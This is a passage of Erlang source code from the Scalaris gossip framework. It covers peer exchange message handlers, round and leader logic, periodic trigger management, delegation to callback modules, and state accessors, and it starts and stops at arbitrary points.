            comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State3)}),
            State3
    end;

%% This message is a reply from a callback module to CBModule:select_reply_data().
%% The stored reply peer for Ref is looked up (and removed) and the reply data
%% is sent back to it as p2p_exch_reply; without a stored peer only a warning
%% is logged.
handle_msg({selected_reply_data, CBModule, QData, Ref, Round}, State)->
    case take_reply_peer(Ref, State) of
        {none, State1} ->
            log:log(warn, "[ Gossip ] Got 'selected_reply_data', but no matching reply peer stored in State.");
        {Peer, State1} ->
            comm:send(Peer, {p2p_exch_reply, CBModule, comm:this(), QData, Round}, [{shepherd, self()}])
    end,
    log:log(debug, "[ Gossip ] selected_reply_data. CBModule: ~w, QData ~w",
            [CBModule, QData]),
    State1;

%% This message is a reply from another peer (i.e. another gossip module) to
%% a p2p_exch request, usually results in CBModule:integrate_data().
%% Round handling mirrors the p2p_exch clause above.
handle_msg({p2p_exch_reply, CBModule, SourcePid, QData, OtherRound}=Msg, State) ->
    log:log(debug, "[ Gossip ] p2p_exch_reply, CBModule: ~w, QData ~w", [CBModule, QData]),
    case check_round(OtherRound, CBModule, State) of
        {ok, State1} ->
            cb_integrate_data(QData, OtherRound, Msg, CBModule, State1);
        {start_new_round, State1} -> % self is leader
            ?TRACE_ROUND("[ Gossip ] Starting a new round p2p_exch_reply", []),
            State2 = cb_notify_change(new_round, state_get({round, CBModule}, State1), CBModule, State1),
            State3 = cb_integrate_data(QData, OtherRound, Msg, CBModule, State2),
            comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State3)}),
            State3;
        {enter_new_round, State1} ->
            ?TRACE_ROUND("[ Gossip ] Entering a new round p2p_exch_reply", []),
            State2 = cb_notify_change(new_round, state_get({round, CBModule}, State1), CBModule, State1),
            cb_integrate_data(QData, OtherRound, Msg, CBModule, State2);
        {propagate_new_round, State1} -> % i.e. MyRound > OtherRound
            ?TRACE_ROUND("[ Gossip ] propagate round in p2p_exch_reply", []),
            comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State1)}),
            cb_integrate_data(QData, OtherRound, Msg, CBModule, State1)
    end;

%% This message is a reply from a callback module to CBModule:integrate_data().
%% Marks the end of a cycle; the behaviour module counts cycles by counting
%% these messages (see module doc: only an approximation).
handle_msg({integrated_data, CBModule, cur_round}, State) ->
    state_update({cycle, CBModule}, fun (X) -> X+1 end, State);

% finishing an old round should not affect cycle counter of current round
handle_msg({integrated_data, _CBModule, prev_round}, State) ->
    State;

%% pass messages for callback modules to the respective callback module
%% messages to callback modules need to have the form {cb_msg, CBModule, Msg}.
%% Use envelopes if necessary.
handle_msg({cb_msg, CBModule, Msg}, State) ->
    cb_handle_msg(Msg, CBModule, State);

% round propagation message: enter the new round if it is ahead of ours,
% otherwise (already entered / peer behind) ignore it
handle_msg({new_round, CBModule, NewRound}, State) ->
    MyRound = state_get({round, CBModule}, State),
    if
        MyRound < NewRound ->
            ?TRACE_ROUND("[ Gossip ] Entering new round via round propagation message", []),
            State1 = cb_notify_change(new_round, NewRound, CBModule, State),
            State2 = state_set({round, CBModule}, NewRound, State1),
            state_set({cycle, CBModule}, 0, State2);
        MyRound =:= NewRound -> % i.e. the round propagation msg was already received
            ?TRACE_ROUND("[ Gossip ] Received propagation msg for round i'm already in", []),
            State;
        MyRound > NewRound ->
            ?TRACE_ROUND("[ Gossip ] MyRound > OtherRound", []),
            State
    end;

%% Received through stop_gossip_task/bulkowner
%% Stops gossip tasks and cleans state of all garbage;
%% sets a tombstone to handle possible subsequent requests for already
%% stopped tasks.
handle_msg({stop_gossip_task, CBModule}, State) ->
    log:log(?SHOW, "[ Gossip ] Stopping ~w", [CBModule]),
    % shutdown callback module
    State1 = cb_shutdown(CBModule, State),
    % delete callback module dependent entries from state
    State2 = state_remove_cb(CBModule, State1),
    % remove from list of modules
    State3 = state_update(cb_modules, fun(Modules) -> lists:delete(CBModule, Modules) end, State2),
    % remove from trigger group
    % NOTE(review): the group is read from the original State, not State3 —
    % presumably safe since the steps above do not touch trigger groups; verify
    Interval = cb_config(trigger_interval, CBModule) div 1000,
    CBModules = state_get({trigger_group, Interval}, State),
    NewCBModules = lists:delete(CBModule, CBModules),
    State4 = case NewCBModules of
                 [] ->
                     % last module of this interval: schedule trigger removal
                     NewState = state_set({trigger_group, Interval}, NewCBModules, State3),
                     state_update(trigger_remove, fun (Intervals) -> [Interval|Intervals] end, NewState);
                 _ ->
                     state_set({trigger_group, Interval}, NewCBModules, State3)
             end,
    % set tombstone
    State5 = state_set({cb_status, CBModule}, tombstone, State4),
    State5.
%% @doc Renews the trigger message and handles addition/removal of triggers.
%%      To avoid infecting mpath traces with infinite triggers, a base trigger
%%      with interval 1s is started during the startup of the process. This
%%      trigger is uninfected, even if it belongs to a node which was added
%%      during infection.
%%
%%      To add and remove callback module specific triggers without infecting
%%      the triggers, the request for the addition/removal of a trigger is
%%      saved to the state and processed during the handling of the base
%%      trigger.
-spec handle_trigger(TriggerInterval::non_neg_integer(), state()) -> state().
handle_trigger(TriggerInterval, State) ->
    ToRemove = state_get(trigger_remove, State),
    % removal list decides whether this trigger is renewed
    State1 =
        case lists:member(TriggerInterval, ToRemove) of
            true ->
                % remove the trigger simply by not renewing it
                ?TRACE_TRIGGER("Remove trigger: ~w", [TriggerInterval]),
                % the base trigger (interval 1) is renewed unconditionally,
                % even if it was on the removal list
                case TriggerInterval of
                    1 -> msg_delay:send_trigger(1, {gossip_trigger, 1});
                    _ -> ok
                end,
                state_update(trigger_remove,
                             fun (Intervals) ->
                                     lists:delete(TriggerInterval, Intervals)
                             end, State);
            false ->
                % renew the trigger
                msg_delay:send_trigger(TriggerInterval, {gossip_trigger, TriggerInterval}),
                State
        end,
    % start any newly requested triggers
    case state_get(trigger_add, State1) of
        [] -> State1;
        NewIntervals ->
            ?TRACE_TRIGGER("Add triggers: ~w", [NewIntervals]),
            _ = [msg_delay:send_trigger(I, {gossip_trigger, I})
                 || I <- NewIntervals],
            state_set(trigger_add, [], State1)
    end.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Msg Exchange with Peer
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% called by either on({selected_data,...}) or on({selected_peer, ...}),
% depending on which finished first
%% @doc Starts the data exchange with the selected peers: sends a p2p_exch
%%      message (with this module's round) to each peer's gossip process and
%%      frees the trigger lock. If a peer is this node itself, a new random
%%      node is requested instead and the peer part of exch_data is reset.
-spec start_p2p_exchange(Peers::[node:node_type(),...], PData::gossip_beh:exch_data(),
    CBModule::cb_module(), State::state()) -> state().
start_p2p_exchange(Peers, PData, CBModule, State) ->
    SendToPeer = fun(Peer, StateIn) ->
        case node:is_me(Peer) of
            false ->
                %% log:log(warn, "starting p2p exchange. Peer: ~w~n",[Peer]),
                ?SEND_TO_GROUP_MEMBER(
                    node:pidX(Peer), gossip,
                    {p2p_exch, CBModule, comm:this(), PData, state_get({round, CBModule}, StateIn)}),
                state_set({trigger_lock, CBModule}, free, StateIn);
            true ->
                %% todo does this really happen??? cyclon should not have itself in the cache
                log:log(?SHOW, "[ Gossip ] Node was ME, requesting new node"),
                request_random_node(CBModule),
                % BUGFIX: use a fresh variable here — matching against the
                % already-bound Peer caused a badmatch, as the stored peer part
                % of exch_data is typically 'undefined' at this point
                {_Node, Data} = state_get({exch_data, CBModule}, StateIn),
                state_set({exch_data, CBModule}, {undefined, Data}, StateIn)
        end
    end,
    lists:foldl(SendToPeer, State, Peers).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Interacting with the Callback Modules
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% @doc Starts all statically configured gossip tasks (?CBMODULES).
%%      Called when the gossip module is activated; every callback module is
%%      initialised with the current neighborhood.
-spec init_gossip_tasks(nodelist:neighborhood(), state()) -> state().
init_gossip_tasks(Neighbors, State) ->
    Args = [{neighbors, Neighbors}],
    lists:foldl(fun(CBModule, AccState) ->
                        init_gossip_task(CBModule, Args, AccState)
                end, State, ?CBMODULES).
%% @doc Initialises a gossip task / callback module: calls the module's init
%%      function, sets up its bookkeeping entries in the framework state,
%%      notifies it about the current leader state and adds it to a trigger
%%      group matching its trigger interval.
%%      Called on activation of the gossip module or on a start_gossip_task
%%      message.
-spec init_gossip_task(CBModule::cb_module(), Args::list(), State::state()) -> state().
init_gossip_task(CBModule, Args, State) ->
    % initialize CBModule
    CBState = cb_init([{instance, CBModule} | Args], CBModule),
    State1 = state_set({cb_state, CBModule}, CBState, State),
    % create the module's bookkeeping entries (status, cycle/round counters,
    % empty exchange data, free trigger lock)
    State2 = lists:foldl(fun({Key, Value}, StateIn) -> state_set({Key, CBModule}, Value, StateIn) end,
                         State1,
                         [{cb_status, started}, {cycle, 0}, {exch_data,
                          {undefined, undefined}}, {round, 0}, {trigger_lock, free}]
                        ),
    % notify cb module about leader state
    MyRange = state_get(range, State2),
    LeaderMsg = case is_leader(MyRange) of
                    true -> {is_leader, MyRange};
                    false -> {no_leader, MyRange}
                end,
    State3 = cb_notify_change(leader, LeaderMsg, CBModule, State2),
    % configure and add trigger (interval is configured in ms, triggers use s)
    TriggerInterval = cb_config(trigger_interval, CBModule) div 1000,
    ?TRACE_TRIGGER("Initiating Trigger for ~w. Interval: ~w", [CBModule, TriggerInterval]),
    {TriggerGroup, State4} =
        case state_get({trigger_group, TriggerInterval}, State3) of
            false ->
                % create and init new trigger group and request the new trigger
                % (the actual trigger is started by handle_trigger/2)
                NewState1 = state_update(trigger_add, fun (List) -> [TriggerInterval|List] end, State3),
                {[CBModule], NewState1};
            OldTriggerGroup ->
                % add CBModule to existing trigger group
                {[CBModule|OldTriggerGroup], State3}
        end,
    State5 = state_set({trigger_group, TriggerInterval}, TriggerGroup, State4),
    % add CBModule to list of cbmodules
    state_update(cb_modules, fun(CBModules) -> [CBModule|CBModules] end, State5).
%% @doc Calls the config function FunName of the callback module.
%%      Allowed config functions are:
%%      <ul>
%%        <li> fanout: the number of peers contacted per cycle </li>
%%        <li> min_cycles_per_round: The minimum number of cycles per round </li>
%%        <li> max_cycles_per_round: The maximum number of cycles per round </li>
%%        <li> trigger_interval: The time interval in ms after which a new cycle
%%             is triggered </li>
%%      </ul>
-spec cb_config(FunName, CBModule) -> non_neg_integer() when
    is_subtype(FunName, fanout | min_cycles_per_round | max_cycles_per_round | trigger_interval),
    is_subtype(CBModule, cb_module()).
cb_config(FunName, {ModuleName, _Id}) ->
    % the config values are exported as zero-arity functions by the cb module
    apply(ModuleName, FunName, []).
%% @doc Called upon startup and calls CBModule:init().
%%      Passes the given arguments to the callback module's init function,
%%      which is usually used to build the callback module's initial state.
%%      Crashes (badmatch) if the callback module does not return {ok, _}.
-spec cb_init(Args::list(proplists:property()), cb_module()) -> CBState::any().
cb_init(Args, {ModuleName, _Id}) ->
    {ok, InitialCBState} = ModuleName:init(Args),
    InitialCBState.
%% @doc Called at the beginning of every cycle and calls CBModule:select_node().
%%      Should return true, if the peer selection is to be done by behaviour module,
%%      false otherwise. If false is returned, the behaviour module expects a
%%      selected_peer message.
-spec cb_select_node(cb_module(), state()) -> {boolean(), state()}.
cb_select_node(CBModule, State) ->
    % plain delegation; cb_call/4 threads the callback state through
    cb_call(select_node, [], CBModule, State).
%% @doc Called at the beginning of a cycle and calls CBModule:select_data().
%%      The callback module has to select the exchange data to be sent to the
%%      peer. The exchange data has to be sent back to the gossip module as a
%%      message of the form {selected_data, Instance, ExchangeData}.
%%      If 'discard_msg' is returned, the current trigger is ignored.
%%      (Note: Storing the trigger in the message queue would lead to self-accelerating
%%      recursion of storing and triggering)
-spec cb_select_data(cb_module(), state()) -> state().
cb_select_data(CBModule, State) ->
    case cb_call(select_data, [], CBModule, State) of
        {ok, State1} ->
            State1;
        {discard_msg, State1} ->
            % no exchange will start this cycle, so release the trigger lock
            state_set({trigger_lock, CBModule}, free, State1)
    end.
%% @doc Called upon a p2p_exch message and calls CBModule::select_reply_data().
%%      Passes the PData from a p2p_exch request to the callback module. The callback
%%      module has to select the exchange data to be sent to the peer. The Ref is
%%      used by the behaviour module to identify the request.
%%      The RoundStatus and Round information can be used for special handling
%%      of messages from previous rounds.
%%      The selected reply data is to be sent back to the behaviour module as a
%%      message of the form {selected_reply_data, Instance, QData, Ref, Round}.
%%      On certain return values, the reply_peer is removed from the state of the
%%      gossip module. This is necessary if the callback module will not send a
%%      selected_reply_data message (because the message is discarded or sent back directly).
-spec cb_select_reply_data(PData::gossip_beh:exch_data(), Ref::pos_integer(),
    Round::non_neg_integer(), Msg::message(), CBModule::cb_module(), State::state()) -> state().
cb_select_reply_data(PData, Ref, Round, Msg, CBModule, State) ->
    case cb_call(select_reply_data, [PData, Ref, Round], CBModule, State) of
        {ok, State1} -> State1;
        {discard_msg, State1} ->
            % no reply will follow, drop the stored reply peer
            {_Peer, State2} = take_reply_peer(Ref, State1),
            State2;
        {retry, State1} ->
            % requeue the original message for a later attempt
            {_Peer, State2} = take_reply_peer(Ref, State1),
            msg_queue_add(Msg, State2);
        {send_back, State1} ->
            % reject the request and inform the original sender
            {p2p_exch, _, SourcePid, _, _} = Msg,
            comm:send(SourcePid, {send_error, comm:this(), Msg, message_rejected}),
            {_Peer, State2} = take_reply_peer(Ref, State1),
            State2
    end.
%% @doc Called upon a p2p_exch_reply message and calls CBModule:integrate_data().
%%      Passes the QData from a p2p_exch_reply to the callback module. Upon finishing
%%      the processing of the data, a message of the form
%%      {integrated_data, Instance, RoundStatus} is to be sent to the gossip module.
%%      'retry' requeues the message, 'send_back' rejects it towards the sender,
%%      'ok' and 'discard_msg' need no further action.
-spec cb_integrate_data(QData::gossip_beh:exch_data(), OtherRound::non_neg_integer(),
    message(), cb_module(), state()) -> state().
cb_integrate_data(QData, OtherRound, Msg, CBModule, State) ->
    {RetVal, NewState} = cb_call(integrate_data, [QData, OtherRound], CBModule, State),
    case RetVal of
        retry ->
            msg_queue_add(Msg, NewState);
        send_back ->
            {p2p_exch_reply, _, SourcePid, _, _} = Msg,
            comm:send(SourcePid, {send_error, comm:this(), Msg, message_rejected}),
            NewState;
        ok ->
            NewState;
        discard_msg ->
            NewState
    end.
%% @doc Called upon messages of the form {cb_msg, CBModule, Msg} and calls
%%      CBModule:handle_msg().
%%      Passes the message Msg to the callback module, used to handle messages
%%      for the callback module.
-spec cb_handle_msg(comm:message(), cb_module(), state()) -> state().
cb_handle_msg(Msg, CBModule, State) ->
    % the callback is expected to always answer {ok, NewState}
    {ok, State1} = cb_call(handle_msg, [Msg], CBModule, State), State1.
%% @doc Called upon {web_debug_info} messages and calls CBModule:web_debug_info().
%%      The callback module has to return debugging infos, to be displayed in the
%%      Scalaris Web Debug Interface.
-spec cb_web_debug_info(cb_module(), state()) ->
    {[{Key::string(), Value::any()}], state()}.
cb_web_debug_info(CBModule, State) ->
    % plain delegation; cb_call/4 threads the callback state through
    cb_call(web_debug_info, [], CBModule, State).
%% @doc Called upon every p2p_exch/p2p_exch_reply message and calls
%%      CBmodule:round_has_converged().
%%      The callback module should return true if the current round has converged
%%      to a stable value, false otherwise (refers to gossip based aggregation
%%      protocols implementing a convergence criterion).
-spec cb_round_has_converged(cb_module(), state()) -> {boolean(), state()}.
cb_round_has_converged(CBModule, State) ->
    % plain delegation; cb_call/4 threads the callback state through
    cb_call(round_has_converged, [], CBModule, State).
%% @doc Called to notify the callback module about certain state changes independent
%%      of the standard message loop.
%%      Used to notify a callback module about
%%      <ul>
%%        <li> 'new_round': the starting of a new round </li>
%%        <li> 'leader': changes in the key range of the node. The MsgTag indicates
%%             whether the node is a leader or not, the NewRange is the new
%%             key range of the node </li>
%%        <li> 'exch_failure': a failed message delivery, including exchange
%%             Data and Round from the original message </li>
%%      </ul>
-spec cb_notify_change(Tag::new_round, Round::non_neg_integer(), cb_module(), state()) -> state();
                      (Tag::leader, {is_leader|no_leader, intervals:interval()}, cb_module(), state()) -> state();
                      (Tag::exch_failure, {MsgTag::atom(), Data::any(), Round::non_neg_integer()}, cb_module(), state()) -> state().
cb_notify_change(Tag, Notification, CBModule, State) ->
    % the callback is expected to always answer {ok, NewState}
    {ok, State1} = cb_call(notify_change, [Tag,Notification], CBModule, State),
    State1.
%% @doc Called upon stop_gossip_task(CBModule) and calls CBModule:shutdown().
%%      It should be the opposite of init() and do any necessary clean up.
-spec cb_shutdown(cb_module(), state()) -> state().
cb_shutdown(CBModule, State) ->
    % the callback is expected to always answer {ok, NewState}
    {ok, State1} = cb_call(shutdown, [], CBModule, State), State1.
%% @doc Helper function for the cb_* functions.
%%      Adds the state of the respective callback module as the last argument,
%%      calls the given function of the callback module and stores the
%%      returned callback state back into the gossip state.
-spec cb_call(cb_fun_name(), list(), cb_module(), state()) -> {ReturnValue::any(), state()}.
cb_call(FunName, Args, CBModule={ModuleName, _InstanceId}, State) when is_atom(ModuleName) ->
    % every callback returns a {ReturnValue, NewCBState} tuple
    Args1 = Args ++ [state_get({cb_state, CBModule}, State)],
    {ReturnValue, ReturnedCBState} = apply(ModuleName, FunName, Args1),
    {ReturnValue, state_set({cb_state, CBModule}, ReturnedCBState, State)}.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Requesting Peers
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%% @doc Sends the local node's cyclon process an enveloped request for a random node.
%%      The request is routed through the gossip_cyclon callback instance; the
%%      reply arrives as {selected_peer, CBModule, {cy_cache, Cache}} and is
%%      handled by on_active/2.
-spec request_random_node(CBModule::cb_module()) -> ok.
request_random_node(CBModule) ->
    % reply_as/3 wraps the cyclon answer into the third tuple position ('_')
    EnvPid = comm:reply_as(self(), 3, {selected_peer, CBModule, '_'}),
    Fanout = cb_config(fanout, CBModule),
    comm:send_local(self(), {cb_msg, {gossip_cyclon, default},
                             {get_subset_rand, Fanout, EnvPid}}).
%% @doc Used for rerequesting peers from cyclon when cyclon returned an empty list,
%%      which is usually the case during startup.
%%      The delay (given in ms, sent in s) prohibits bombarding the cyclon
%%      process with requests.
-spec request_random_node_delayed(Delay::0..4294967295, CBModule::cb_module()) ->
    ok.
request_random_node_delayed(Delay, CBModule) ->
    % reply_as/3 wraps the cyclon answer into the third tuple position ('_')
    EnvPid = comm:reply_as(self(), 3, {selected_peer, CBModule, '_'}),
    Fanout = cb_config(fanout, CBModule),
    % msg_delay expects seconds, Delay is given in milliseconds
    msg_delay:send_local(Delay div 1000, self(), {cb_msg, {gossip_cyclon, default},
                                                  {get_subset_rand, Fanout, EnvPid}}).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Round Handling
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%% @doc Compares the round of an incoming message with the local round.
%%      Called at every p2p_exch and p2p_exch_reply message. Returns
%%      <ul>
%%        <li> ok: rounds match, nothing to do </li>
%%        <li> start_new_round: rounds match, this node is the leader and the
%%             current round is finished (counters are reset here) </li>
%%        <li> enter_new_round: the sender is ahead, the sender's round is
%%             adopted and the cycle counter reset </li>
%%        <li> propagate_new_round: the sender is behind and should be
%%             informed about the newer round </li>
%%      </ul>
-spec check_round(OtherRound::non_neg_integer(), CBModule::cb_module(), State::state())
        -> {ok | start_new_round | enter_new_round | propagate_new_round, state()}.
check_round(OtherRound, CBModule, State) ->
    MyRound = state_get({round, CBModule}, State),
    ?TRACE_ROUND("[ Gossip ] check_round. CBModule: ~w. MyRound: ~w. OtherRound: ~w",
                 [CBModule, MyRound, OtherRound]),
    Leader = is_leader(state_get(range, State)),
    case MyRound =:= OtherRound of
        true when Leader ->
            % only the leader may decide that a round has finished
            case is_end_of_round(CBModule, State) of
                {true, State1} ->
                    State2 = state_update({round, CBModule}, fun (X) -> X+1 end, State1),
                    State3 = state_set({cycle, CBModule}, 0, State2),
                    {start_new_round, State3};
                {false, State1} -> {ok, State1}
            end;
        true ->
            {ok, State};
        false when MyRound < OtherRound ->
            State1 = state_set({round, CBModule}, OtherRound, State),
            State2 = state_set({cycle, CBModule}, 0, State1),
            {enter_new_round, State2};
        false when MyRound > OtherRound ->
            {propagate_new_round, State}
    end.
%% @doc Checks the convergence of the current round (only called at leader).
%%      A round ends when the minimum number of cycles has passed and either
%%      the maximum number of cycles is reached or the callback module reports
%%      convergence.
-spec is_end_of_round(CBModule::cb_module(), State::state()) -> {boolean(), state()}.
is_end_of_round(CBModule, State) ->
    Cycles = state_get({cycle, CBModule}, State),
    ?TRACE_ROUND("[ Gossip ] check_end_of_round. Cycles: ~w", [Cycles]),
    {RoundHasConverged, State1} = cb_round_has_converged(CBModule, State),
    IsEndOfRound = Cycles >= cb_config(min_cycles_per_round, CBModule) andalso
        ( ( Cycles >= cb_config(max_cycles_per_round, CBModule)) orelse
          ( RoundHasConverged ) ),
    {IsEndOfRound, State1}.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Range/Leader Handling
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%% @doc Checks whether the node is the current leader.
%%      The leader is the node whose key range contains the hash of "0".
-spec is_leader(MyRange::intervals:interval()) -> boolean().
is_leader(MyRange) ->
    intervals:in(?RT:hash_key("0"), MyRange).
%% @doc Checks whether the node's range has changed, i.e. either the node
%%      itself or its pred changed.
%%      Used as the subscription filter for the ring maintenance.
-spec rm_my_range_changed(OldNeighbors::nodelist:neighborhood(),
                          NewNeighbors::nodelist:neighborhood(),
                          IsSlide::rm_loop:reason()) -> boolean().
rm_my_range_changed(OldNeighbors, NewNeighbors, _IsSlide) ->
    nodelist:node(OldNeighbors) =/= nodelist:node(NewNeighbors) orelse
        nodelist:pred(OldNeighbors) =/= nodelist:pred(NewNeighbors).
%% @doc Notifies the node's gossip process of a changed range.
%%      Used to subscribe to the ring maintenance; the gossip process receives
%%      an {update_range, NewRange} message.
-spec rm_send_new_range(Subscriber::pid(), Tag::?MODULE,
                        OldNeighbors::nodelist:neighborhood(),
                        NewNeighbors::nodelist:neighborhood(),
                        Reason::rm_loop:reason()) -> ok.
rm_send_new_range(Pid, ?MODULE, _OldNeighbors, NewNeighbors, _Reason) ->
    NewRange = nodelist:node_range(NewNeighbors),
    comm:send_local(Pid, {update_range, NewRange}).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% State: Getters and Setters
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%% @doc Gets the value for the given key from the given state.
%%      Allowed keys:
%%      <ul>
%%        <li>`cb_modules', all active callback modules,</li>
%%        <li>`cb_states', the states of all callback modules,</li>
%%        <li>`cb_stati', stati of all callback modules,</li>
%%        <li>`cycles', the cycles of all callback modules,</li>
%%        <li>`exch_datas', the exch_data of all callback modules,</li>
%%        <li>`msg_queue', the message queue of the gossip module, </li>
%%        <li>`range', the key range of the node, </li>
%%        <li>`reply_peers', all reply_peers, </li>
%%        <li>`rounds', rounds of all callback modules,</li>
%%        <li>`status', the status of the gossip module, </li>
%%        <li>`trigger_add', triggers to be added on next trigger, </li>
%%        <li>`trigger_groups', a list of all trigger groups, </li>
%%        <li>`trigger_locks', a list of all trigger locks, </li>
%%        <li>`trigger_remove', triggers to be removed on next trigger, </li>
%%      </ul>
%%      The entries of the following keys are specified by a {Key, SecondaryKey}
%%      Tuple, allowing to have more than one entry per key. These are implemented
%%      as Tuplelists of [{SecondaryKey, Value}] and accessed by the singular of
%%      the key of the according record field (e.g. "groups" -> "group").
%%      <ul>
%%        <li>`{cb_state, CBModule}', the state of the given callback module, </li>
%%        <li>`{cb_status, CBModule}', indicates, if `init()' was called on given
%%            callback module, </li>
%%        <li>`{cycle, CBModule}', the cycle counter for the given callback module, </li>
%%        <li>`{exch_data, CBModule}', a tuple of the data to exchange and the peer to
%%            exchange the data with. </li>
%%        <li>`{round, CBModule}', the round of the given callback module, </li>
%%        <li>`{reply_peer, Ref}', the peer to send the p2p_exch_reply to, </li>
%%        <li>`{trigger_group, TriggerInterval}', the trigger group (i.e. a list
%%            of callback modules) to the given TriggerInterval, </li>
%%        <li>`{trigger_lock, CBModule}', locks triggering while within prepare-request
%%            phase for the given callback module, </li>
%%      </ul>
-spec state_get(cb_modules, state()) -> [cb_module()];
               (cb_states, state()) -> [{cb_module(), any()}];
               (cb_stati, state()) -> [{cb_module(), cb_status()}];
               (cycles, state()) -> [{cb_module(), non_neg_integer()}];
               (exch_datas, state()) -> [{cb_module(), exch_data()}];
               (msg_queue, state()) -> msg_queue:msg_queue();
               (range, state()) -> intervals:interval();
               (reply_peers, state()) -> [{Ref::pos_integer(), Pid::comm:mypid()}];
               (rounds, state()) -> [{cb_module(), non_neg_integer()}];
               (status, state()) -> status();
               (trigger_add, state()) -> [pos_integer()];
               (trigger_groups, state()) -> [{TriggerInterval::pos_integer(), CBModules::[cb_module()]}];
               (trigger_locks, state()) -> [{cb_module(), locked | free}];
               (trigger_remove, state()) -> [pos_integer()];
               ({cb_state, cb_module()}, state()) -> any();
               ({cb_status, cb_module()}, state()) -> cb_status() | false;
               ({cycle, cb_module()}, state()) -> non_neg_integer() | false;
               ({exch_data, cb_module()}, state()) -> exch_data() | false;
               ({round, cb_module()}, state()) -> non_neg_integer() | false;
               ({trigger_group, TriggerInterval::pos_integer()}, state()) -> [cb_module()] | false;
               ({trigger_lock, cb_module()}, state()) -> locked | free | false.
% direct record field access for simple keys
state_get(cb_modules, State=#state{cb_modules=CBModules}) when is_record(State, state) ->
    CBModules;
state_get(cb_states, State=#state{cb_states=CBStates}) when is_record(State, state) ->
    CBStates;
state_get(cb_stati, State=#state{cb_stati=CBStati}) when is_record(State, state) ->
    CBStati;
state_get(cycles, State=#state{cycles=Cycles}) when is_record(State, state) ->
    Cycles;
state_get(exch_datas, State=#state{exch_datas=ExchDatas}) when is_record(State, state) ->
    ExchDatas;
state_get(msg_queue, State=#state{msg_queue=MsgQueue}) when is_record(State, state) ->
    MsgQueue;
state_get(range, State=#state{range=Range}) when is_record(State, state) ->
    Range;
state_get(reply_peers, State=#state{reply_peers=ReplyPeers}) when is_record(State, state) ->
    ReplyPeers;
state_get(rounds, State=#state{rounds=Round}) when is_record(State, state) ->
    Round;
state_get(status, State=#state{status=Status}) when is_record(State, state) ->
    Status;
state_get(trigger_add, State=#state{trigger_add=Triggers}) when is_record(State, state) ->
    Triggers;
state_get(trigger_groups, State=#state{trigger_groups=TriggerGroups}) when is_record(State, state) ->
    TriggerGroups;
state_get(trigger_locks, State=#state{trigger_locks=TriggerLocks}) when is_record(State, state) ->
    TriggerLocks;
state_get(trigger_remove, State=#state{trigger_remove=Triggers}) when is_record(State, state) ->
    Triggers;
% tuplelist lookup for {Key, SecondaryKey} keys (false if no entry exists)
state_get({cb_state, CBModule}, State=#state{cb_states=CBStates}) when is_record(State, state) ->
    state_get_helper(CBModule, CBStates);
state_get({cb_status, CBModule}, State=#state{cb_stati=CBStati}) when is_record(State, state) ->
    state_get_helper(CBModule, CBStati);
state_get({cycle, CBModule}, State=#state{cycles=Cycles}) when is_record(State, state) ->
    state_get_helper(CBModule, Cycles);
state_get({exch_data, CBModule}, State=#state{exch_datas=ExchDatas}) when is_record(State, state) ->
    state_get_helper(CBModule, ExchDatas);
state_get({round, CBModule}, State=#state{rounds=Round}) when is_record(State, state) ->
    state_get_helper(CBModule, Round);
state_get({trigger_group, Interval}, State=#state{trigger_groups=TriggerGroups}) when is_record(State, state) ->
    state_get_helper(Interval, TriggerGroups);
state_get({trigger_lock, CBModule}, State=#state{trigger_locks=TriggerLocks}) when is_record(State, state) ->
    state_get_helper(CBModule, TriggerLocks).
%% @doc Helper for state_get/2: looks up the given (secondary) key in a
%%      tuplelist of {Key, Value} pairs. Returns the stored value or false
%%      if no entry for the key exists.
-spec state_get_helper(pos_integer() | cb_module() , [{cb_module()|pos_integer(), ValueType::any()}]) -> ValueType::any().
state_get_helper(Key, TupleList) when is_list(TupleList) ->
    case lists:keyfind(Key, 1, TupleList) of
        false -> false;
        {Key, StoredValue} -> StoredValue
    end.
%% @doc Sets the given value for the given key in the given state.
%%      Simple keys replace the whole record field; {Key, SecondaryKey} keys
%%      insert/replace one entry of the field's tuplelist.
%%      For a description of the keys see state_get/2.
-spec state_set(cb_modules, [cb_module()], state()) -> state();
               (msg_queue, msg_queue:msg_queue(), state()) -> state();
               (range, intervals:interval(), state()) -> state();
               (status, status(), state()) -> state();
               (trigger_add, [pos_integer()], state()) -> state();
               (trigger_remove, [pos_integer()], state()) -> state();
               ({cb_state, cb_module()}, any(), state()) -> state();
               ({cb_status, cb_module()}, cb_status(), state()) -> state();
               ({cycle, cb_module()}, non_neg_integer(), state()) -> state();
               ({exch_data, cb_module()}, exch_data(), state()) -> state();
               ({reply_peer, Ref::pos_integer()}, comm:mypid(), state()) -> state();
               ({round, cb_module()}, non_neg_integer(), state()) -> state();
               ({trigger_group, TriggerInterval::pos_integer()}, [cb_module()], state()) -> state();
